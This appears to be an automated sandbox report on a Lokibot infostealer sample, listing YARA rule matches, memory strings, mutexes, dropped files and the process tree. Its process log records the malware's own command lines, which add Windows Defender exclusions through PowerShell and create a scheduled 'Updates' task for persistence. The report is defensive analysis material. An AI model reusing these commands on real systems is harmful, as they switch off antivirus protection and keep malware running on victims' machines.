Source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Code function: 0_2_0128D3A4	0_2_0128D3A4
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Code function: 0_2_0A7D04D0	0_2_0A7D04D0
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Code function: 0_2_0A7D1088	0_2_0A7D1088
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: 10_2_00CAD3A4	10_2_00CAD3A4
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: 18_2_0040549C	18_2_0040549C
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: 18_2_004029D4	18_2_004029D4

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Code function: String function: 00405B6F appears 42 times

Source: kzQ25HVUbf.exe, 00000000.00000000.1346020412.00000000008C2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDJsZ.exe6 vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1458431204.0000000003D60000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1443326979.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1473618044.000000000721B000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1458431204.0000000003F21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe, 00000000.00000002.1469707572.00000000054B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs kzQ25HVUbf.exe
Source: kzQ25HVUbf.exe	Binary or memory string: OriginalFilenameDJsZ.exe6 vs kzQ25HVUbf.exe

Source: kzQ25HVUbf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: kzQ25HVUbf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iWEWjTXiqXke.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/17@0/1

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Code function: 18_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

18_2_0040434D

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp53FD.tmp

Jump to behavior

Source: kzQ25HVUbf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: kzQ25HVUbf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kzQ25HVUbf.exe	ReversingLabs: Detection: 65%
Source: kzQ25HVUbf.exe	Virustotal: Detection: 73%

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

File read: C:\Users\user\Desktop\kzQ25HVUbf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Section loaded: version.dll	Jump to behavior
